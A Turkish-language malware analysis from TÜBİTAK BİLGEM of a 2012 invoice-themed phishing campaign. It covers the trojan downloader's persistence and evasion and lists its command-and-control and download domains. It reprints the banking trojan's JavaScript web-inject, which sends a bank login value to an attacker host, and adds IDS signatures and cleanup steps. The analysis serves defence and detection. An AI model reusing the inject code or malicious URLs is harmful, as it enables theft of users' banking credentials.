spacer.png, 0 kB
Bilgi için: bilgi at bilgiguvenligi gov tr   

 

spacer.png, 0 kB
spacer.png, 0 kB
Fatura Zararlı Yazılımı (FatMal) Yazdır E-posta
Osman PAMUK, Necati Ersen ŞİŞECİ, TÜBİTAK BİLGEM   
27.12.2012

19 Aralık 2012 perşembe günü başlayan, farklı şekillerde günlerce devam eden ve özellikle Türkiye kullanıcılarını hedef alan oltalama (phishing) e-postaları ile zombi bilgisayar oluşturma saldırısı gerçekleştirilmektedir.  Saldırıda ülkemizde çok sayıda müşterisi bulanan firmaların isimleri kullanılmakta ve bu firmalardan gönderilmiş gibi gösterilen e-postalar ile kurbanlar kandırılmaya çalışılmaktadır. Bu yazıda, saldırının ve gelecekte olabilecek benzer saldırıların etkilerinin azaltmasına yardımcı olmak amacıyla saldırıyı gerçekleştirmek için kullanılan zararlı yazılımların detaylı incelemesi yapılmıştır.

resim-1.png

Şekil 1 Oltalama E-postasını Gönderen Noktalar

tablo-1bucuk.png

Tablo 1 Gelen Oltalama E-postalarının Ülkelere Yüzde Göre Dağılımı

Yayılma Yöntemi

Bu yazılım oltalama (phishing) e-postalarının eklentisi olarak yayılmaya çalışmaktadır. Aşağıdaki şekil, bu zararlı yazılımın tespit edildiği oltalama e-postalarından birinin görüntüsüdür.

resim-2.png

Şekil 2 Kullanıcılara gönderilen oltalama E-posta örneği

Turkcell, THY, Vodafone, Finansbank ve FedEx gibi kurumlardan da geliyormuş gibi gözüken ve haddi zatında bu kurumlarla hiçbir ilgisi olmayan e-postalarda, kullanıcının gelen e-postadaki eklentiyi açması istenmektedir.  Gelen e-postanın eklentisi Fatura_Bildirimi.pdf.zip isminde sıkıştırılmış bir arşiv dosyasıdır. Bu sıkıştırılmış arşiv dosyası içinde Fatura_Bildirimi.pdf.exe uygulama dosyası bulunmaktadır. Windows işletim sistemlerinde “Bilinen dosya türleri için uzantıları gizle” ayarı varsayılan ayar olarak etkindir.  Bu ayarın değiştirilmediği sistemlerde bu dosya Fatura_Bildirimi.pdf şeklide gözükecektir [1]. Bu e-posta ve eklentisini alan kullanıcılar, PDF dosyası açmaya çalıştırdıkları takdirde, bu zararlı yazılımın kendi sistemlerine bulaşmasına neden olacaktır

resim-3.png

Şekil 3 "Bilinen dosya türleri için uzantıları gizle" ayarı etkin iken görünüm

resim-4.png

Şekil 4  "Bilinen dosya türleri için uzantıları gizle" ayarı etkin değil iken görünüm

Teknik Özellikleri

tablo-2bucuk.png

Tablo 2  Zararlı yazılım dosyaları

Zararlı yazılımın çalışma şekli zamana ve bulunduğu sistem göre değişiklik gösterebilir. Bu çalışma sırasında işletim sistemi olarak 32 bit Windows XP SP3 kullanılmıştır.

 Fatura_Bildirimi.pdf.exe truva atı indirici programı (trojan downloader) özelliğinde bir zararlı yazılımdır. Bu yazılım paketlenmemiş bir formattadır. Fakat statik analizini zorlaştırmak amacıyla kullanacağı önemli API fonksiyonları çalışma sırasında belirlenip çağrılmakta [2] ve bu API fonksiyonların isimleri kodlanmış (encoded) halde tutulmaktadır. Bu zararlı yazılım çalıştığında ilk olarak kendisinin bir kopyasını oluşturmakta, oluşturulduğu bu kopyayı çalıştırmadan önce bu kopyanın kodlarında bazı değişiklik yapmaktadır [3]. Kodları değiştirilmiş bu kopya program çalışması sırasında, sistemde çalışır halde bulunan diğer işlemleri gözden geçirmekte ve eğer bu işlemler içinde zararlı yazılım analizi için kullanılan belli başlı programların isimleri varsa, zararlı yazılım farklı bir şekilde çalışmaktadır. Sistemde çalışır durumda olup olmadığına bakıldığı tespit edilen işlem isimlerinden birkaçı şunlardır:

  • VMwareUser.exe

  • netmon.exe

  • procmon.exe

Eğer sistemde bu isimlerden herhangi birisine ait bir işlem çalışıyorsa zararlı yazılım  %AllUsersProfile% klasöründe svchost.exe isminde, kendi kopyası olan bir dosya oluşturmaktadır. Daha sonra bu dosyanın her bilgisayar açılışında işletim sistemi tarafından çalıştırılması için HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched kayıt defteri girdisini oluşturmaktadır. Bütün işlemlerin sonunda, zararlı yazılım çalıştığı sistemin 8000 inci portunda uzaktan komut satırı çalıştırma için kullanılabilecek bir arka kapı açmaktadır. Bu tür bir arka kapının, saldırganın bir işine yarama ihtimali pratikte oldukça azdır. Bu sebeple bu arka kapının, ancak zararlı yazılımı incelemek isteyen kişileri şaşırtmak için, koruma amaçlı yapılmış bir davranış biçimi olduğu düşünülmektedir.

Eğer sistemde çalışan işlem isimleri arasında zararlı yazılımın kontrol ettiği analiz programlarından herhangi birisi yoksa, zararlı yazılım ilk önce C:\WINDOWS\system32\wuauclt.exe uygulamasını kendi istediği kodları çalıştıracak şekilde başlatmaktadır [3]. Değiştirilmiş wuauclt.exe işlemi ise %AllUsersProfile%\Local Settings\Temp klasörü altında Fatura_Bildirimi.pdf.exe dosyasının kopyası olan bir dosya oluşturmaktadır. Bu dosyanın ismi ve uzantısı (com, scr, exe, …) farklı farklı olabilmektedir.  Daha sonra zararlı yazılım bu dosyanın her açılışta sistem tarafında çalıştırılması için HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\2143 kayıt defteri girdisini oluşturmaktadır. Son olarak değiştirilmiş wuauclt.exe işlemi saldırının bundan sonraki aşamalarını gerçekleştirecek olan diğer zararlı yazılımı indirip çalıştırmakta ve kontrolü bu yeni zararlı yazılıma bırakmaktadır. Değiştirilmiş wuauclt.exe işleminin ikinci zararlı yazılımı indireceği adresi öğrenmek için http üzerinden bağlanmaya çalıştığı tespit edilen adresler şu şekildedir: 

  • moid.pl

  • linebench.ru

  • maidarm.ru

  • wildrive .com

  • iprice .pl

  • headart.pl

Bu adreslerden birine eriştikten sonra öğrendiği ve ulaşamaya çalıştığı zararlı yazılım adresi ise şu şekildedir:

  • www.tabody-villa.com/bilder/Neu/spools.exe

spools.exe zararlı yazılımı, Fatura_Bildirimi.pdf.exe zararlı yazılımından farklı bir yazılımdır. Truva atı görevindedir. spools.exe programı, truva atı indirici zararlı yazılımı tarafından çalıştırıldıktan sonra, ilk önce %UserProfile%\Application Data klasörü altında kendisinin bir kopyası olan KB00599455.exe dosyasını oluşturmaktadır. Daha sonra bu dosyanın her kullanıcı oturumu açılışında sistem tarafından çalıştırılması için HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00599455.exe kayıt girdisini oluşturmaktadır. Ayrıca bu kayıt anahtarının izinlerini değiştirmekte ve silinmesini zorlaştırmaktadır. Son olarak ta spools.exe  işlemi, KB00599455.exe işlemini başlatmakta ve kendini sonlandırmadan önce oluşturduğu bir bat dosyası yardımıyla, kendi işlemi sonlandıktan sonra sabit diskteki dosyasının ve bat dosyasının kendisinin silinmesini sağlamaktadır. KB00599455.exe işlemi ise temel olarak Explorer.exe işlemine kod enjekte etme görevini gerçekleştirmektedir. Bu işlem bittikten sonra kendisini sonlandırmaktadır. Enjekte edilip çalıştırılan zararlı kod ise http üzerinden aşağıdaki adresler ile iletişime geçmeye çalışmaktadır:

  • veryadat.ru

  • mantiffpif.ru

  • lohtikr.ru

Bu iletişimin başarı ile gerçekleştiği durumda, %UserProfile%\Application Data\E5BC3B1C\E5BC3B1C.DAT.DAT konfigürasyon dosyası oluşturulmaktadır. Bu konfigürasyon dosyasında birçok banka ve sosyal paylaşım web sitesine ait adres isimlerinin bulunduğu görülmüştür. Bunlardan birkaçı aşağıdaki gibidir:

*tdbank.com*, *finansbank.com.tr*, *garanti.com.tr*, *ingbank.com.tr*, *isbank.com.tr*, *tes.teb.com.tr*, *akbank.com*, *kuveytturk.com.tr*, *vakifbank.com.tr*, *yapikredi.com.tr*, *facebook.com*, *twitter.com*, *blogger.com*, *flickr.com*, *livejournal.com*, …

Yukarıda listelenen bankalarla alakalı bankacılık işlemlerinin arasına giren zararlı yazılım bunu JavaScript kodlarıyla gerçekleştirmektedir. Zararlı yazılıma ait konfigürasyon dosyasında ING Bank ile ilgili geçen kod parçacıkları aşağıda verilmiştir.

var __url__ = 'hxxps://custom-apistore.com/n/';

function jsLoader (url) {

    var loader = document.createElement('script');

    loader.type = 'text/javascript';

    loader.src = url;

    document.body.appendChild(loader);

}


function loadInject () {

    var load = ($('#lngid').html().indexOf('User Code') == -1 ? 'tr' : 'en');

    showInjectLoading();jsLoader(__url__ + '?load=' + load + '&login=' + $('input[name="h7"]').val() + '&url=ing&m=' + Math.random());

}

Yukarıdaki kod parçacığından da anlaşıldığı üzere custom-apistore.com adresine parametre olarak dil, login, banka ismi ve rastgele bir sayı gönderilmektedir. Sayfada bulunan uygulama bankaya göre özelleştirilmiş JavaScript kodunu üretmektedir.

Custom-apistore.com alan adresine ait whois bilgisi aşağıda yer almaktadır.

domain:       custom-apistore.com

owner:        Y***** S****

email:        ******@ymail.com

address:      Unalan Mh.Soyak Sitesi, Uskudar

city:         Istambul

state:        --

postal-code:  23133

country:      TR

phone:        +90.216*******

admin-c:      CCOM-1981176 ******@ymail.com

tech-c:       CCOM-1981176 ******@ymail.com

billing-c:    CCOM-1981176 ******@ymail.com

nserver:      a.ns.joker.com 184.172.157.218 2607:f0d0:1301:6d:222:19ff:fed5:f877

nserver:      b.ns.joker.com 159.25.97.69

nserver:      c.ns.joker.com 66.197.237.21

status:       lock

created:      2012-12-13 02:34:59 UTC

modified:     2012-12-13 03:07:02 UTC

expires:      2013-12-13 02:34:59 UTC

contact-hdl:  CCOM-1981176

person:       Y***** S****

email:        ******@ymail.com

address:      Unalan Mh.Soyak Sitesi, Uskudar

city:         Istambul

state:        --

postal-code:  23133

country:      TR

phone:        +90.216*******


source:       joker.com live whois service

query-time:   0.007441

db-updated:   2012-12-25 18:21:20

Yukarıdaki alan adı bilgilerinden de anlaşılacağı üzere alan adı, 2012-12-13 02:34:59 UTC tarih ve saatinde, joker.com alan adı kayıtçısı üzerinden kayıt edilmiştir.

Tespit Etme Yöntemi

İki zararlı yazılım türü de ağ üzerinden bağlanmaya çalıştıkları alan adlarının ilk önce IP adreslerini çözmeye çalışmaktadırlar. Bu sebeple oluşacak olan DNS istekleri takip edilebilir. DNS isteklerinin takibinde geç kalındığı veya mümkün olmadığı durumlarda ise bağlanılmaya çalışılan bu alan adlarının sahip olduğu IP adreslerine erişim takip edilebilir. Bunun yanında bu erişimler http protokolü üzerinden gerçekleştiği için bu http trafiğini tespit etme amaçlı IDS imzalarının oluşturulması mümkündür.  Truva atı indirici özellikteki ilk zararlı yazılımın ağda tespiti için aşağıdaki saldırı tespit sistemi imzaları kullanılabilir:

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Zeus Variant C&C Connection"; flow:established,to_server; content:"POST "; nocase; depth:5; content:"|20|HTTP/1.1|0d 0a|"; content:"User-Agent|3a| Mozilla/4.0|0d 0a|"; http_header; content:"Content-Type|3A| application/x-www-form-urlencoded";http_header; sid:5001301; reference:url,www.bilgiguvenligi.gov.tr;  classtype: malware-cnc;)

 

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0)"; flow:to_server,established; content:"User-Agent\: Mozilla/4.0|0d 0a|"; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003492; sid:2003492; rev:5;

Temizleme Yöntemi

resim-5.png

Şekil 5 Zararlı yazılımların otomatik çalıştırılma ayarları

Teknik özellikler bölümünde açıklandığı üzere, indirici olarak görev yapan ilk zararlı yazılım kendi kopyası olan:

C:\Documents and Settings\All Users\svchost.exe

veya

C:\Documents and Settings\All Users\Local Settings\Temp\XXXX.XXX

Dosyasını oluşturmakta ve bu programları çalıştırmak için:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ Run\SunJavaUpdateSched

veya

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\2143

Kayıt girdilerini oluşturmaktadır.

İkinci zararlı yazılım ise, kendi kopyası olan:

%UserProfile%\Application Data\KB00599455.exe

Dosyasını oluşturmakta ve bu programı çalıştırmak için:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Kayıt girdisini oluşturmaktadır.

Bu sebeple bu kayıt girdileri ve ilgili olduğu bu zararlı yazılım dosyaları silindikten sonra sistem yeniden başlatıldığı takdirde bu zararlı yazılımdan kurtulmak mümkündür.

Yukarıda bahsedilen temizleme yöntemini otomatik olarak gerçekleştirmek aşağıdaki araçlar kullanılabilir:

  • Tek başına çalışan son kullanıcı bilgisayarlarında çalıştırılabilecek ikili dosya için buraya tıklayın (Henüz bu araç hazırlanmamıştır.).

  • Etki alanı yöneticilerinin kullanacağı ve etki alanı  politikası olarak uygulanabilecek betik için buraya tıkayın.

Söz konusu temizleme araçları Windows XP SP3 üzerinde denenmiş olup diğer sistemlerde test edilmemiştir. Zararlı yazılımın temizlenmesi sırasında oluşacak sorunlarda sorumluluk kabul edilmez.

Referanslar

[1]    http://windows.microsoft.com/tr-TR/windows-vista/Show-or-hide-file-name-extensions

[2]    http://www.bigresource.com/VB-Call-API-with-CallWindowProc-NT2py1yuT9.html

[3]    http://blog.spiderlabs.com/2011/05/analyzing-malware-hollow-processes.html


Favori olarak ekle (3) | Görüntüleme sayısı: 27784

Yorumlar (3)
1. 06-02-2013 16:44
 
Elinize sağlık. Araştırmalarım sonucu tek kaynak olarak burayı buldum ve üye oldum.  
Mehmet Kuşdoğan; Win7 üzerinde bu zararlıyla karşılaştım ve belirtilen yolları izledim sonuç olumlu, ama haliyle win xp ve win 7 arasında dosya isimleri ve yolları biraz farklı ama regedit kayıtları birebir tutuyor. Saygılar.
 
Çınar GÜNGÖR
2. 29-01-2013 09:49
 
Merhaba.. 
bu çalışmanız çok faydalı.. bu zararlı son günlerde firmamıza mail yolu ile ulaştı.. en son bir fax iletisi gönderir gibi geldi.. acaba windows 7 üzerinde bir çalışmanız oldu mu?
 
Mehmet Kuşdoğan
3. 29-12-2012 02:52
 
Ellerine sağlık Mükemmel açıkladınız.
 
sezer güneş

Sadece kayıtlı kullanıcılar yorum yazabilir.
Lütfen sisteme giriş yapın veya kayıt olun.

 
spacer.png, 0 kB
spacer.png, 0 kB
Copyright 2014 TÜBİTAK-BİLGEM. Sitenin teknik altyapısında Joomla kullanılmıştır. Yazar ve site referans gösterilmeden alıntı yapılamaz. Görüşleriniz
spacer.png, 0 kB